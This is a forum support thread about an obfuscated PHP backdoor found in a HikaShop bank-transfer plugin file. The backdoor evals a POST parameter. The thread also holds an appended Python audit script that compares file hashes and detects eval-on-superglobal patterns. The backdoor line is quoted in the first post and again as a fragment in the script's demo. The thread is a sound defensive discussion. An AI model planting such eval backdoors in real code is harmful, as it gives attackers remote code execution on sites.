Suspicious Code in Hikashop File

  • Posts: 174
  • Thank you received: 4
  • Hikashop Business
9 years 7 months ago #225858

-- HikaShop version -- : 2.6.0
-- Joomla version -- : 3.4.8
-- PHP version -- : 5.5

Hi,
The file in

/plugins/hikashoppayment/banktransfer/start.php

has the following code

$ptcm54 = "post_" ; $xqnq6= strtoupper ( $ptcm54[4].$ptcm54[0] .$ptcm54[1].$ptcm54[2].$ptcm54[3] );if (isset(${$xqnq6 } [ 'q7f2521']) ) {eval (${ $xqnq6} [ 'q7f2521' ]);} ?

Does this look suspicious? (It was flagged by myjoomla.com)


  • Posts: 13201
  • Thank you received: 2322
9 years 7 months ago #225868

Hi,

This does indeed look suspicious. As you can see, on our end the banktransfer plugin should only have three files: take.ms/kgyfl

Last edit: 9 years 7 months ago by Xavier.
The following user(s) said Thank You: kchahine


  • Posts: 174
  • Thank you received: 4
  • Hikashop Business
9 years 7 months ago #225930

Would a reinstall overwrite these files?


  • Posts: 26264
  • Thank you received: 4043
  • MODERATOR
9 years 7 months ago #225931

Hi,

Yes, it is highly recommended.
For sure you can remove that file, which is not a HikaShop one.
And you should also perform a check on the rest of your Joomla files, in case some other files have been added or modified.

Regards,


Jerome - Obsidev.com
HikaMarket & HikaSerial developer / HikaShop core dev team.

Also helping the HikaShop support team when I have some time or can't sleep.
By the way, do not send me private messages; use the "contact us" form instead.
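
The two checks discussed in this thread, spotting the flagged eval construct and finding files that were added or modified, can be automated by comparing the live tree against a freshly unpacked trusted copy. This is an added example, not code from the thread or from HikaShop: the function names, the `plugin.php` placeholder and the temporary trees are constructed, and the `start.php` content is only a fragment of the line quoted in the first post.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Heuristics for the construct quoted in the first post: eval() fed from a
# variable variable (${$name}[...]) or straight from a request superglobal.
SUSPICIOUS = [
    ("eval-variable-variable", re.compile(r"(?i)eval\s*\(\s*\$\{\s*\$\w+\s*\}")),
    ("eval-superglobal", re.compile(r"(?i)eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b")),
]

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def build_manifest(clean_root):
    """Map relative path -> SHA-256 for a freshly unpacked, trusted copy."""
    root = Path(clean_root)
    return {p.relative_to(root).as_posix(): sha256(p)
            for p in root.rglob("*") if p.is_file()}

def audit(live_root, manifest):
    """Return sorted (relative_path, finding) pairs for the live tree."""
    root, findings = Path(live_root), []
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        if rel not in manifest:
            findings.append((rel, "unexpected-file"))
        elif sha256(p) != manifest[rel]:
            findings.append((rel, "modified"))
        if p.suffix.lower() == ".php":
            text = p.read_text(errors="replace")
            findings += [(rel, name) for name, rx in SUSPICIOUS if rx.search(text)]
    return sorted(findings)

def demo():
    """Constructed trees: file names and contents are placeholders."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for root in (clean, live):
            root.mkdir()
            (root / "plugin.php").write_text("<?php // placeholder plugin code\n")
        (live / "plugin.php").write_text("<?php // placeholder, tampered\n")
        (live / "start.php").write_text(r"<?php eval (${ $xqnq6} [ 'q7f2521' ]);")
        return audit(live, build_manifest(clean))

if __name__ == "__main__":
    print(demo())
```

Build the manifest from a clean download of the same extension version that is installed; the patterns are heuristics and will not catch every obfuscated variant, which is why the hash comparison runs on every file regardless of content.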
